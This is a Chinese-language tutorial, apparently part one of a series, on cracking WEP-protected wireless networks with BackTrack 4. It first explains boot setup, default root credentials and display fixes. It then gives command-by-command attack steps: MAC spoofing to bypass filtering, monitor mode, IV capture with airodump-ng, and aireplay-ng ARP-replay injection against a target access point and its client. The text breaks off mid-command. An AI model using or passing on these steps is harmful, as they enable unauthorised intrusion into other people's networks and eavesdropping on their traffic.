BT4无线网络破解教程之一.docVIP

BT4无线网络破解教程之一 1.下载光盘版BT4.iso,copy其中的boot和bt4到U盘，windows下运行bootinst.bat安装到U盘。VM版的BT4可能对集成的无线网卡支 　　持不太好，USB无线网卡则支持得很好。 　　或者用硬盘启动方式：下载光盘版BT4.iso,解压其中的boot和bt4到D盘根目录,下载grub4dos,解压其中的grldr、menu.lst、 　　grldr.mbr，放C盘根目录下 　　编辑bcd: 　　bcdedit /create /d Grub /application bootsector 　　回显: 项 {5e098857-4818-11de-b43e-001eec90feb6} 成功创建。 　　接着用下面的指令来设置引导参数,{id}替换为上面回显的ID，建议用复制粘贴 　　bcdedit /set {id} device boot 　　bcdedit /set {id} path \grldr.mbr 　　bcdedit /displayorder {id} /addlast 　　设置等待时间 　　bcdedit /timeout 5 　　( 　　如果要卸载，运行 　　bcdedit 　　查看Grub的{id}后， 　　bcdedit /delete {id} 　　) 　　2.启动BT4，选console控制台模式，用户名root,密码toor注意不是root,再运行sta盘盘rtx启动窗口模式。 　　另：BT4启动黑屏问题解决办法 　　输入root toor 登录系统后在输入 fixvesa 然后 startx如果不行就输入 fixvmware,然后输入startx.还是不能就输入Xorg - 　　configure 然后startx 　　我的笔记本产U盘启动BT4，startx时按住空格可以进入.。 　　问题：我在启动bt3 的时候，输入startx黑屏 　　解答：在输入用户名root 和密码toor 以后输入xconf 这时会黑屏一会，然后出来提示符再输入startx 可进入 　　win窗口；当实在不能进入win窗口的时候你也可以直接在提示符下输入各破解命令，同时可用alt+f1 打开 　　一个shell，alt+f2 打开第二个shell，alt+f3 打开第三个等。关闭窗口用PRINT SCREEN 键 　　---------------------end--------------------- 　　[] 可选 　　回显 　　/ 或者 　　() 提示 　　---------------------WEP--------------------- 　　shell 1:---------------------------------------- 　　1.ifconfig -a 　　wlan0 ... xx:xx:xx:xx:xx:xx 　　[ 　　macchanger -m 00:11:22:33:44:55 wlan0 　　修改自己网卡的MAC 地址。当对方设置了MAC 地址过滤时或为了方便后面输入 　　] 　　2.ifconfig -a wlan0 up 　　(5100可能要加载网卡才支持注入?) 　　3.airmon-ng start wlan0 6 　　monitor mode enabled on mon0 　　(6是频道) 　　另一说5100要支持注入用airmon-ng start wlan0 　　如果这里回显(monitor mode enabled) 则下面命令所有端口号要用wlan0 　　[ 　　aireplay-ng -9 mon0 / aireplay-ng --test mon0 　　Injection is working/No anwser(注入攻击成功/不成功) 　　(检测你的网卡是否支持注入) 　　] 　　4.airodump-ng -w pack -c 6 mon0/wlan0 　　(pack是随便起的获取的ivs的保存文件的名字) 　　另一说用airodump-ng --ivs -w pack -c 6 mon0/wlan0 　　shell 2:---------------------------------------- 　　一、有客户端： 　　破解:abcd四种方式 　　a.合法客户端产生大量有效的数据，能直接获得大量cap。 　　收到10000以上data后，直接转shell 3,破解密码 　　b.合法客户端只能产生少量数据，就需要注入-3攻击加速产生大量数据。 　　5.aireplay-ng -3 -b 000000000000(APmac) -h 111111111111(合法客户端mac) mon0/wlan